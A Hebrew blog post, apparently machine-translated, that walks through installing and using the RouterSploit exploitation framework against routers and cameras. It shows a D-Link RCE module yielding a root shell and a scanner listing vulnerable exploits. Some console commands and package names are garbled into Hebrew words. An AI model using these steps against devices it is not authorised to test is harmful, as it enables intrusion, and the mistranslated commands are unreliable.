בית » כלי לינוקס » RouterSploit – מדריך שלם של מסגרת ניצול [2020]

RouterSploit – מדריך שלם של מסגרת ניצול [2020]

על ידי הסויאש
routersploit

RouterSploit היא מסגרת ניצול מדהימה שנעשתה במיוחד עבור מכשירים משובצים.

כלי זה יכול לשמש את pentester כדי לסרוק את האבטחה של מצלמות ונתבים.

הדגשות של RouterSploit:

  • מקודד ב- Python.
  • ממשק שורת הפקודה.
  • תמיכת Docker.
  • כלים מודולריים.

מערכת הפעלה נתמכת:

  1. MacOS.
  2. לינוקס.
  3. טלפון אנדרואיד.
  4. חלונות.

התקנת RouterSploit:

דרישות:

  • עָתִידִי
  • בקשות
  • Paramic
  • לְהַפְסִיק
  • pycrypto

אופציונלי:

  • כחולה – Bluetooth באנרגיה נמוכה

התקנה בקאלי לינוקס:

בצע את הפקודות למטה:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

תמיכה ב-Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

התקנה באובונטו:

בצע את הפקודות למטה:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

תמיכה ב-Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

התקנה על MacOS:

בצע את הפקודות למטה:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

התקנה על Docker:

בצע את הפקודות למטה:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

כיצד לעדכן RouterSploit?

עליך לעדכן את RouterSploit לעתים קרובות כדי למנוע אי נוחות.

מודולים חדשים נשלחים כמעט כל יום.

cd routersploit
git pull

כיצד להשתמש ב-RouterSploit?

נוֹהָג

root@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       מסגרת ניצול עבור    |_|   מאת Threat9
            מכשירים משובצים
  
 שם קוד   : ידעתי שאתה צרות
 גרסה    : 3.3.0
 דף הבית   : https://www.threat9.com/ - @threatnine
 הצטרף ל-Slack : routersploit.slack.com

 הצטרף לתוכנית הביטא Threat9 - https://www.threat9.com/

 מנצלים: 128 סורקים: 4 קרדס: 165 כְּלָלִי: 4 מטענים: 32 מקודדים: 6

rsf >

מנצלים:

כדי לבצע את הניצול, פשוט בחר את המודול והגדר את היעד:

rsf > השתמש בניצול/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > השתמש ב-exploit/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

להשלמה השתמש במקש Tab.

להצגת אפשרויות, סוּגshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > הצג אפשרויות

אפשרויות יעד:


   שם הגדרות נוכחיות תיאור                                
   ----       ----------------     -----------                                
   יעד כתובת יעד, למשל. http://192.168.1.1     
   נָמָל       80                   נמל יעד

לְהִשְׁתַמֵשׁrun אוֹexploit פקודה כדי לנצל את המטרה:

rsf (D-LINK DIR-300 & DIR-600 RCE) > לָרוּץ
[+] המטרה היא פגיעה
[*] מפעיל לולאת פקודה...
cmd > וואומי
שורש

כדי להגדיר אפשרויות:

rsf (D-LINK DIR-300 & DIR-600 RCE) > הגדר יעד http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

אפשר לבדוק אם היעד פגיע לניצול מסוים:

rsf (D-LINK DIR-300 & DIR-600 RCE) > לִבדוֹק
[+] המטרה היא פגיעה

לָרוּץshow info כדי להציג מידע על הניצול.

סריקה לאיתור יעדים פגיעים:

סורקים מאפשרים לאמת במהירות אם היעד חשוף לניצול כלשהו.

השתמש באותן פקודות כדי להציג/להגדיר אפשרויות, וגם לרוץ.

rsf (סורק D-Link) > לָרוּץ
[+] exploits/dlink/dwr_932_info_disclosure הוא פגיע
[-] exploits/dlink/dir_300_320_615_auth_bypass אינו פגיע
[-] exploits/dlink/dsl_2750b_info_disclosure אינו פגיע
[-] exploits/dlink/dns_320l_327l_rce אינו פגיע
[-] exploits/dlink/dir_645_password_disclosure אינו פגיע
[-] exploits/dlink/dir_300_600_615_info_disclosure אינו פגיע
[-] exploits/dlink/dir_300_600_rce אינו פגיע

[+] המכשיר פגיע!
- exploits/dlink/dwr_932_info_disclosure

RouterSploit הרשמי

קרא גם: 1337x proxy

מילים אחרונות:

RouterSploit הוא כלי מדהים לשימוש.

אם אתה נתקל בבעיות כלשהן בנוגע ל RouterSploit. הקפד להגיב למטה. הצוות שלנו CSHAWK ייצור איתך קשר בהקדם.

השאר תגובה